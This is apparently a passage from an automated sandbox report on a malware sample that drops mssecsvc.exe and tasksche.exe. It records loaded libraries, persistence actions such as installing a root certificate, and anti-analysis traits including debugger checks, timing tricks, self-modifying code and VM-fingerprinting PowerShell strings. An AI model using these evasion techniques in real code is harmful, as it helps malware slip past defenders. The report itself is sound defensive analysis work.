Source: C:\Windows\System32\dllhost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: msvcp60.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior

Source: C:\Windows\mssecsvc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: GeW4GzT8G8.dll

Static file information: File size 5267459 > 1048576

Source: GeW4GzT8G8.dll

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x501000

Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Diagnostics.pdb source: svchost.exe, 00000018.00000002.2737701303.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1534945793.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000018.00000000.1534844506.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2736501628.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbx source: svchost.exe, 00000018.00000002.2737701303.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1534945793.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000018.00000000.1534844506.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2736501628.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ~1.PDB @7_9)ux source: svchost.exe, 00000018.00000000.1534844506.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2736501628.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000018.00000000.1535058474.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2738834921.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000018.00000000.1535058474.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2738834921.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error3)y source: svchost.exe, 00000018.00000002.2737701303.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1534945793.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000018.00000002.2737701303.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1534945793.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000018.00000000.1535058474.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2738834921.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000018.00000002.2737701303.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1534945793.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000018.00000000.1535058474.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2738834921.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000018.00000000.1534844506.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2736501628.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb04 source: svchost.exe, 00000018.00000000.1535058474.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2738834921.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: mp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000018.00000002.2737701303.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1534945793.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorV)y source: svchost.exe, 00000018.00000002.2737701303.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1534945793.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000018.00000000.1534844506.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2736501628.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\symsrv.dllp.pdb source: svchost.exe, 00000018.00000000.1535058474.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2738834921.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Windows\mssecsvc.exe

Code function: 6_2_00AD3D36 LoadLibraryA,GetProcAddress,LoadLibraryA,GetTickCount,GetVolumeInformationA,GetModuleFileNameA,wsprintfA,CreateThread,CloseHandle,CreateThread,CloseHandle,CreateEventA,socket,connect,GetVersionExA,wsprintfA,CreateThread,CloseHandle,GetTickCount,

6_2_00AD3D36

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Windows\System32\lsass.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D			Jump to behavior
Source: C:\Windows\System32\lsass.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D			Jump to behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\SysWOW64\rundll32.exe

Executable created and started: C:\WINDOWS\mssecsvc.exe

Jump to behavior

Installs new ROOT certificates

Source: C:\Windows\System32\lsass.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\System32\lsass.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\mssecsvc.exe			Jump to dropped file
Source: C:\Windows\mssecsvc.exe	File created: C:\Windows\tasksche.exe			Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\mssecsvc.exe			Jump to dropped file
Source: C:\Windows\mssecsvc.exe	File created: C:\Windows\tasksche.exe			Jump to dropped file

Source: C:\Windows\System32\lsass.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD4178	6_2_00AD4178
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE34178	6_2_7FE34178
Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE44178	12_2_7FE44178
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA4178	17_2_00AA4178
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE44178	17_2_7FE44178

Found evasive API chain (may execute only at specific dates)

Source: C:\Windows\mssecsvc.exe

Evasive API call chain: GetSystemTime,DecisionNodes,Sleep

graph_12-3973

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Windows\mssecsvc.exe	Special instruction interceptor: First address: A718D7 instructions caused by: Self-modifying code
Source: C:\Windows\mssecsvc.exe	Special instruction interceptor: First address: A6B2E5 instructions caused by: Self-modifying code

Source: C:\Windows\mssecsvc.exe

Code function: 6_2_00AD042D rdtsc

6_2_00AD042D

Source: C:\Windows\mssecsvc.exe

Thread delayed: delay time: 86400000

Jump to behavior

Source: C:\Windows\mssecsvc.exe

Dropped PE file which has not been started: C:\Windows\tasksche.exe

Jump to dropped file

Source: C:\Windows\mssecsvc.exe

Evasive API call chain: GetSystemTime,DecisionNodes

graph_12-3973

Source: C:\Windows\mssecsvc.exe	API coverage: 6.2 %
Source: C:\Windows\mssecsvc.exe	API coverage: 0.3 %
Source: C:\Windows\mssecsvc.exe	API coverage: 5.9 %

Source: C:\Windows\mssecsvc.exe

Code function: 17_2_7FE44178

17_2_7FE44178

Source: C:\Windows\mssecsvc.exe TID: 6592	Thread sleep count: 89 > 30	Jump to behavior
Source: C:\Windows\mssecsvc.exe TID: 6592	Thread sleep time: -178000s >= -30000s	Jump to behavior
Source: C:\Windows\mssecsvc.exe TID: 6968	Thread sleep count: 125 > 30	Jump to behavior
Source: C:\Windows\mssecsvc.exe TID: 6968	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Windows\mssecsvc.exe TID: 6592	Thread sleep time: -86400000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 120000			Jump to behavior
Source: C:\Windows\mssecsvc.exe	Thread delayed: delay time: 86400000			Jump to behavior

Source: svchost.exe, 0000001B.00000000.1549814166.0000024BD362B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.2749546037.0000024BD362B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: svchost.exe, 00000009.00000000.1486630702.00000138ED23A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@vmicheartbeat
Source: mssecsvc.exe, 00000011.00000002.2280369063.0000000000B09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh0\|
Source: svchost.exe, 0000001B.00000000.1549862680.0000024BD3643000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@vmci
Source: mssecsvc.exe, 00000011.00000002.2280369063.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8l
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.27.dr	Binary or memory string: VMware SATA CD00
Source: svchost.exe, 00000017.00000000.1524144488.000002238202B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.27.dr	Binary or memory string: NECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.27.dr	Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: mssecsvc.exe, 00000006.00000002.1710923691.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, mssecsvc.exe, 00000006.00000002.1710923691.0000000000C06000.00000004.00000020.00020000.00000000.sdmp, mssecsvc.exe, 0000000C.00000002.1694346996.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.1499329638.000001CD55600000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2786637408.000001CD55600000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2787499046.000001CD5562B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.1499405327.000001CD5562B000.00000004.00000001.00020000.00000000.sdmp, mssecsvc.exe, 00000011.00000002.2280369063.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, mssecsvc.exe, 00000011.00000003.1638909218.0000000000B09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.27.dr	Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.27.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: svchost.exe, 0000001B.00000000.1556665864.0000024BD5A12000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: svchost.exe, 0000001B.00000002.2747358780.0000024BD35D0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pVMwareVirtual disk6000c29198182f16b7176b0e680deba6
Source: dwm.exe, 00000012.00000000.1515747636.0000026DACB82000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: System.evtx.27.dr	Binary or memory string: VMCI: Using capabilities (0x1c).
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.27.dr	Binary or memory string: pVMwareVirtual disk6000c29198182f16b7176b0e680deba68
Source: svchost.exe, 0000001B.00000000.1556665864.0000024BD5A12000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: mssecsvc.exe, 00000011.00000003.1638909218.0000000000B09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh1}
Source: svchost.exe, 00000009.00000002.2770718862.00000138EDA25000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.27.dr	Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.27.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: svchost.exe, 0000001B.00000000.1551024707.0000024BD5024000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmcir:m
Source: mssecsvc.exe, 0000000C.00000002.1694346996.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(<
Source: svchost.exe, 00000009.00000002.2770718862.00000138EDA25000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: svchost.exe, 00000009.00000000.1486630702.00000138ED23A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $@vmicshutdown
Source: svchost.exe, 0000001B.00000000.1550978406.0000024BD3FE2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: dowvmci
Source: Microsoft-Windows-Ntfs%4Operational.evtx.27.dr	Binary or memory string: VMware
Source: svchost.exe, 0000001B.00000000.1556665864.0000024BD5A12000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: svchost.exe, 00000009.00000000.1486630702.00000138ED23A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @vmicshutdown
Source: svchost.exe, 00000009.00000002.2770718862.00000138EDA25000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: svchost.exe, 0000001B.00000000.1556665864.0000024BD5A12000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.27.dr	Binary or memory string: VMware Virtual disk 2.0 6000c29198182f16b7176b0e680deba6PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: lsass.exe, 00000008.00000002.2749131736.00000213BCE89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.27.dr	Binary or memory string: nonicVMware Virtual disk 6000c29198182f16b7176b0e680deba6
Source: svchost.exe, 00000009.00000002.2770929941.00000138EDA33000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: bfe2-06 @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: WebCacheV01.dat.14.dr	Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.27.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: svchost.exe, 00000009.00000000.1486630702.00000138ED23A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@vmicshutdown
Source: Microsoft-Windows-WER-PayloadHealth%4Operational.evtx.27.dr	Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.27.dr	Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: Microsoft-Windows-Partition%4Diagnostic.evtx.27.dr	Binary or memory string: VMwareVirtual disk2.06000c29198182f16b7176b0e680deba6PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 0000001B.00000000.1550291143.0000024BD3C60000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 2ue).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: lsass.exe, 00000008.00000000.1473215790.00000213BCE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2745366001.00000213BCE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1504826902.0000015870613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2737709748.0000015870613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1516994559.000002C9AFC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1518368642.000002C06F02A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2731126124.000002C06F02A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2744359671.0000022382041000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1524196197.0000022382041000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.1549814166.0000024BD362B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.2749546037.0000024BD362B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: lsass.exe, 00000008.00000002.2749131736.00000213BCE89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.27.dr	Binary or memory string: LSI_SASVMware Virtual disk 6000c29198182f16b7176b0e680deba6
Source: svchost.exe, 00000009.00000000.1486630702.00000138ED23A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $@vmicheartbeat
Source: svchost.exe, 00000025.00000000.1585753238.000001EC20C2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.27.dr	Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 0000001B.00000000.1556665864.0000024BD5A12000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: svchost.exe, 00000010.00000002.2744929089.000001587066C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000023.00000000.1580190404.0000023314A02000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000008.00000002.2749131736.00000213BCE89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: svchost.exe, 0000001B.00000000.1556665864.0000024BD5A12000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 00000012.00000000.1515747636.0000026DACB82000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000

Source: C:\Windows\mssecsvc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\mssecsvc.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\mssecsvc.exe

Code function: 6_2_00AD042D rdtsc

6_2_00AD042D

Source: C:\Windows\mssecsvc.exe

Code function: 6_2_7FE3663A LdrInitializeThunk,

6_2_7FE3663A

Source: C:\Windows\mssecsvc.exe

6_2_00AD3D36

Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD05F2 mov eax, dword ptr fs:[00000030h]	6_2_00AD05F2
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD042D mov eax, dword ptr fs:[00000030h]	6_2_00AD042D
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD025E mov edx, dword ptr fs:[00000030h]	6_2_00AD025E
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE305F2 mov eax, dword ptr fs:[00000030h]	6_2_7FE305F2
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE3025E mov edx, dword ptr fs:[00000030h]	6_2_7FE3025E
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE3042D mov eax, dword ptr fs:[00000030h]	6_2_7FE3042D
Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE405F2 mov eax, dword ptr fs:[00000030h]	12_2_7FE405F2
Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE4025E mov edx, dword ptr fs:[00000030h]	12_2_7FE4025E
Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE4042D mov eax, dword ptr fs:[00000030h]	12_2_7FE4042D
